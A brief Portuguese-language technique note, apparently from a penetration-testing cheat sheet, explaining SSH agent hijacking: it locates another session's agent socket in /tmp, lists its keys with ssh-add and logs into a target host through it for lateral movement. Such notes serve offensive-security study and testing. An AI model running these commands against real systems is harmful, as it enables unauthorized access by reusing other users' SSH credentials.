SSH Hijacking

Essa técnica é útil para conectarmos em hosts remotos aproveitando alguma sessão SSH já estabelecida, seja para movimentação lateral ou demais acessos.

Assim que acessamos um SSH, será criado um arquivo com nome semelhante a /tmp/ssh-v7V4k3RHnv/agent.18, que é o socket usado na comunicação com o agent SSH. O primeiro ponto é configurar o socket de autenticação e listar as chaves SSH disponíveis através do agente SSH.

SSH_AUTH_SOCK=/tmp/ssh-v7V4k3RHnv/agent.18 ssh-add -l

A saída deve ser algo como: 2048 SHA256:/IerVscSDibdASROdPtrxWrg <user>@<ip> (RSA)

Agora para acessarmos o host alvo, basta executar o seguinte comando:

SSH_AUTH_SOCK=/tmp/ssh-v7V4k3RHnv/agent.18 ssh <user>@<ip>
PreviousFTPNextSMTP

Last updated